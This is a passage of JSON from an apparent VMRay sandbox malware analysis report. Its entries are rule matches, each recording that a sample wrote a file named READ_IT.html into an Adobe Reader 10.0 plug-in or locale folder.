"technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12706", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12732", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12746", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12760", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12786", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12812", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12864", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12878", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12904", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12918", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12932", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12950", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12968", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12982", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13008", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13034", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13048", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13074", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13088", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13102", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13116", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13130", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13156", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13174", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13192", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13218", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13224", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": 